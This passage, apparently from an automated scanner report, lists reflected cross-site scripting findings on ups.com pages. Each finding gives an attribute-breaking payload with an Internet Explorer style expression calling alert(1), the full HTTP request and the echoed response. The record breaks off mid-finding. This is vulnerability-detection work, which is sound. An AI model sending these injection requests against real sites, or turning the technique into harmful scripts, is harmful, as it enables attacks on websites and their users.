The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed was submitted in the REST URL parameter 3. This input was echoed as c72a4"style="x:expression(alert(1))"ed012a4aeed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enc72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc72a4"style="x:expression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.88. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db was submitted in the REST URL parameter 2. This input was echoed as 9e5ab"style="x:expression(alert(1))"1918f7292db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db/en/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9e5ab"style="x:expression(alert(1))"1918f7292db/en/resources/ship/terms/use.html">
...[SNIP]...

1.89. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e was submitted in the REST URL parameter 3. This input was echoed as 36adc"style="x:expression(alert(1))"4da2f01a87e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76404


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en36adc"style="x:expression(alert(1))"4da2f01a87e/resources/ship/terms/use.html">
...[SNIP]...

1.90. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a was submitted in the REST URL parameter 2. This input was echoed as f4af5"style="x:expression(alert(1))"4ad883a8c4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a/en/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf4af5"style="x:expression(alert(1))"4ad883a8c4a/en/resources/start/index.html">
...[SNIP]...

1.91. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df07"style%3d"x%3aexpression(alert(1))"09777fba220 was submitted in the REST URL parameter 3. This input was echoed as 2df07"style="x:expression(alert(1))"09777fba220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en2df07"style%3d"x%3aexpression(alert(1))"09777fba220/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2df07"style="x:expression(alert(1))"09777fba220/resources/start/index.html">
...[SNIP]...

1.92. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc was submitted in the REST URL parameter 2. This input was echoed as 9f1df"style="x:expression(alert(1))"83776d167cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc/en/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9f1df"style="x:expression(alert(1))"83776d167cc/en/resources/techsupport/index.html">
...[SNIP]...

1.93. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3 was submitted in the REST URL parameter 3. This input was echoed as 4ff19"style="x:expression(alert(1))"b13ed736f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en4ff19"style="x:expression(alert(1))"b13ed736f3/resources/techsupport/index.html">
...[SNIP]...

1.94. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef was submitted in the REST URL parameter 2. This input was echoed as f30c7"style="x:expression(alert(1))"1c7f06c7cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef/en/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42703


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf30c7"style="x:expression(alert(1))"1c7f06c7cef/en/resources/track/index.html">
...[SNIP]...

1.95. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184 was submitted in the REST URL parameter 3. This input was echoed as 96d3c"style="x:expression(alert(1))"7996a1d6184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96d3c"style="x:expression(alert(1))"7996a1d6184/resources/track/index.html">
...[SNIP]...

1.96. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033 was submitted in the REST URL parameter 2. This input was echoed as 2f8ea"style="x:expression(alert(1))"c56152e9033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033/en/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2f8ea"style="x:expression(alert(1))"c56152e9033/en/shipping/index.html">
...[SNIP]...

1.97. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ab7"style%3d"x%3aexpression(alert(1))"0664130560d was submitted in the REST URL parameter 3. This input was echoed as 17ab7"style="x:expression(alert(1))"0664130560d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en17ab7"style%3d"x%3aexpression(alert(1))"0664130560d/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58028


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17ab7"style="x:expression(alert(1))"0664130560d/shipping/index.html">
...[SNIP]...

1.98. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f was submitted in the REST URL parameter 2. This input was echoed as d4ac1"style="x:expression(alert(1))"17b4988c95f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usd4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f/en/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd4ac1"style="x:expression(alert(1))"17b4988c95f/en/shipping/time/service/index.html">
...[SNIP]...

1.99. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20 was submitted in the REST URL parameter 3. This input was echoed as 7b24d"style="x:expression(alert(1))"686e1186d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56193


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en7b24d"style="x:expression(alert(1))"686e1186d20/shipping/time/service/index.html">
...[SNIP]...

1.100. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71 was submitted in the REST URL parameter 2. This input was echoed as 27baa"style="x:expression(alert(1))"2e2ebd57b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54858


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us27baa"style="x:expression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html">
...[SNIP]...

1.101. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7 was submitted in the REST URL parameter 3. This input was echoed as eb749"style="x:expression(alert(1))"2d88e2596e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/eneb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb749"style="x:expression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html">
...[SNIP]...

1.102. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61 was submitted in the REST URL parameter 2. This input was echoed as ff296"style="x:expression(alert(1))"5ef14c9e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61/en/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61601


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usff296"style="x:expression(alert(1))"5ef14c9e61/en/siteguide/index.html">
...[SNIP]...

1.103. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17 was submitted in the REST URL parameter 3. This input was echoed as acee2"style="x:expression(alert(1))"ddaee83ec17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enacee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
